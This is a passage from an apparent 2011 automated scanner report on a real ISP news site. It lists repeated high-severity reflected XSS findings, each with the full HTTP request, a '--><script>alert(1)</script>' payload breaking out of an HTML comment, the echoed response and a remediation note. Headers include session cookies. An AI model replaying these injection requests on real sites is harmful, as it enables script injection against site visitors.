This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /fixed_wireless/equipment/distributors/index.html?1f2ae--><script>alert(1)</script>0c6527430b4=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:48 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:48 GMT Connection: close Content-Type: text/html Content-Length: 56277
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <title>ISP-Planet - ISP Planet - Fixed Wireless - Equipment - Wireless Equip ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /fixed_wireless/equipment/distributors/index.html?1f2ae--><script>alert(1)</script>0c6527430b4=1 --> ...[SNIP]...
3.81. http://www.isp-planet.com/investor/brokers/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/investor/brokers/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 75d25--><script>alert(1)</script>7fdd3a7eb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /investor/brokers/chart.html?75d25--><script>alert(1)</script>7fdd3a7eb68=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:45 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:45 GMT Connection: close Content-Type: text/html Content-Length: 59793
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Investor - ISP Broker Quick Reference Chart</title> <met ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /investor/brokers/chart.html?75d25--><script>alert(1)</script>7fdd3a7eb68=1 --> ...[SNIP]...
3.82. http://www.isp-planet.com/investor/brokers/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/investor/brokers/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2b47--><script>alert(1)</script>3adb9c78876 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /investor/brokers/index.html?c2b47--><script>alert(1)</script>3adb9c78876=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:51 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:51 GMT Connection: close Content-Type: text/html Content-Length: 48459
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Investor - ISP Broker Directory</title> <meta name="chan ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /investor/brokers/index.html?c2b47--><script>alert(1)</script>3adb9c78876=1 --> ...[SNIP]...
3.83. http://www.isp-planet.com/marketing/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/marketing/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e040c--><script>alert(1)</script>71b19238b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /marketing/index.html?e040c--><script>alert(1)</script>71b19238b7e=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:44 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:44 GMT Connection: close Content-Type: text/html Content-Length: 66631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - ISP-Marketing</TITLE> <META NAME="description" CONT ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /marketing/index.html?e040c--><script>alert(1)</script>71b19238b7e=1 --> ...[SNIP]...
3.84. http://www.isp-planet.com/quotes/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/quotes/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 78fc3--><script>alert(1)</script>7dcbdb41c54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /quotes/index.html?78fc3--><script>alert(1)</script>7dcbdb41c54=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:50 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:50 GMT Connection: close Content-Type: text/html Content-Length: 92060
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Notable Quotes</TITLE> <META NAME="description" CON ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /quotes/index.html?78fc3--><script>alert(1)</script>7dcbdb41c54=1 --> ...[SNIP]...
3.85. http://www.isp-planet.com/resources/backbones/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/resources/backbones/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 629b3--><script>alert(1)</script>75e20150d24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /resources/backbones/index.html?629b3--><script>alert(1)</script>75e20150d24=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:41 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:41 GMT Connection: close Content-Type: text/html Content-Length: 39562
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP Planet - Resources - Backbone Directory: An ISP Guide to National ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /resources/backbones/index.html?629b3--><script>alert(1)</script>75e20150d24=1 --> ...[SNIP]...
3.86. http://www.isp-planet.com/resources/directories/state_puc.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/resources/directories/state_puc.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bcad3--><script>alert(1)</script>5f359aca2e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /resources/directories/state_puc.html?bcad3--><script>alert(1)</script>5f359aca2e4=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:39 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:39 GMT Connection: close Content-Type: text/html Content-Length: 55541
<HTML> <HEAD> <TITLE>ISP Planet - Resources - State PUC Directory </TITLE> <META NAME="description" CONTENT="information on information and resources for ISPs"> <META NAME="channel" CONTENT="ISP Resou ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /resources/directories/state_puc.html?bcad3--><script>alert(1)</script>5f359aca2e4=1 --> ...[SNIP]...
3.87. http://www.isp-planet.com/resources/how_to/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/resources/how_to/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b8237--><script>alert(1)</script>824980c5358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /resources/how_to/index.html?b8237--><script>alert(1)</script>824980c5358=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:20 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:20 GMT Connection: close Content-Type: text/html Content-Length: 50140
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Resources - Index.html</TITLE> <link rel="stylesheet" h ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /resources/how_to/index.html?b8237--><script>alert(1)</script>824980c5358=1 --> ...[SNIP]...
3.88. http://www.isp-planet.com/resources/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/resources/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 12656--><script>alert(1)</script>70658e982ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /resources/index.html?12656--><script>alert(1)</script>70658e982ea=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:01 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:01 GMT Connection: close Content-Type: text/html Content-Length: 42918
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML><HEAD> <TITLE>ISP-Planet - Resources </TITLE> <META NAME="description" CONTENT="info ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /resources/index.html?12656--><script>alert(1)</script>70658e982ea=1 --> ...[SNIP]...
3.89. http://www.isp-planet.com/resources/index_lawyer.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/resources/index_lawyer.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 64e48--><script>alert(1)</script>f0377a27e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /resources/index_lawyer.html?64e48--><script>alert(1)</script>f0377a27e76=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:03 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:03 GMT Connection: close Content-Type: text/html Content-Length: 51255
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD>
<TITLE>ISP Planet - Resources - ISP Planet's List of Internet Lawyers</TIT ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /resources/index_lawyer.html?64e48--><script>alert(1)</script>f0377a27e76=1 --> ...[SNIP]...
3.90. http://www.isp-planet.com/resources/isp_guide/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/resources/isp_guide/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8cb82--><script>alert(1)</script>eaba82c6736 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /resources/isp_guide/index.html?8cb82--><script>alert(1)</script>eaba82c6736=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:38 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:38 GMT Connection: close Content-Type: text/html Content-Length: 58306
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD>
<TITLE>ISP Planet - Resources - Guide to Building an ISP</TITLE>
<META ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /resources/isp_guide/index.html?8cb82--><script>alert(1)</script>eaba82c6736=1 --> ...[SNIP]...
3.91. http://www.isp-planet.com/services/asguide/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/asguide/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df0d8--><script>alert(1)</script>87a31f9fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/asguide/index.html?df0d8--><script>alert(1)</script>87a31f9fe67=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:36 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:36 GMT Connection: close Content-Type: text/html Content-Length: 93557
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <title>ISP-Planet - Value-Added Services - Anti-Spam Directory </title> ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/asguide/index.html?df0d8--><script>alert(1)</script>87a31f9fe67=1 --> ...[SNIP]...
3.92. http://www.isp-planet.com/services/billing/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/billing/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b9e0f--><script>alert(1)</script>fd5147eb06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/billing/chart.html?b9e0f--><script>alert(1)</script>fd5147eb06f=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:36 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:36 GMT Connection: close Content-Type: text/html Content-Length: 101988
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Billing Service Directory Quick R ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/billing/chart.html?b9e0f--><script>alert(1)</script>fd5147eb06f=1 --> ...[SNIP]...
3.93. http://www.isp-planet.com/services/billing/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/billing/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 80cb4--><script>alert(1)</script>f89dfcaeda7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/billing/index.html?80cb4--><script>alert(1)</script>f89dfcaeda7=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:11 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:11 GMT Connection: close Content-Type: text/html Content-Length: 42189
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Billing Service Directory</title> ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/billing/index.html?80cb4--><script>alert(1)</script>f89dfcaeda7=1 --> ...[SNIP]...
3.94. http://www.isp-planet.com/services/custsupport/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
